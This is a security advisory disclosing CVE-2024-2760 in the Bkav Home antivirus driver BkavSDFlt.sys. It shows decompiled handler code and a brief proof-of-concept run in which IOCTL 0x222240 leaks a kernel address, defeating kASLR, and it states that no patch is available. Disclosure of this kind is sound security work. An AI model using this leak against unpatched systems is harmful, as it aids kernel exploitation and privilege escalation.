Bkav Home v7816 - Kernel Memory Leak

Description

Bkav Home v7816, build 2403161130 is vulnerable to a Memory Information Leak vulnerability by triggering the 0x222240 IOCTL code of the BkavSDFlt.sys driver.

Vulnerability

The 0x222240 IOCTL code of the BkavSDFlt.sys driver allows to leak the kernel address of an global variable which has always the same offset from the base module, making the kASLR protection useless on that module.

The handling code of the 0x222240 IOCTL calls sub_1400010D8 which copies the absolute address of a global variable into the output buffer of the IRP object.

__int64 __fastcall sub_1400010D8(PIRP pIrp, __int64 a2, __int64 *a3)
{
 unsigned int v3; // r9d
 __int64 v4; // rax

 v3 = 0;
 v4 = 0i64;
 if ( *(_DWORD *)(a2 + 0x10) < 8u )
 {
 v3 = 0xC0000023;
 }
 else
 {
 *(_QWORD *)pIrp->AssociatedIrp.SystemBuffer = &qword_140004230;
    v4 = 8i64;
  }
  *a3 = v4;
  return v3

The PoC will dump the absolute address of such global variable:

PS C:\Users\admin\Desktop> .\IOCTLBruteForce.exe BkavSdFlt 0x222240
[+] 0x222240: (I & O) Bytes sent: 8 (0x8)
[+] 0x222240: Bytes returned: 8 (0x8)
[+]

Our security policy

We have reserved the ID CVE-2024-2760 to refer to this issue from now on.

Disclosure policy

System Information

• Version: Bkav Home v7816, build 2403161130

• Operating System: Windows

Mitigation

There is currently no patch available for this vulnerability.

References

• Vendor page https://www.bkav.com/

• Product page https://www.bkav.com/bkav-home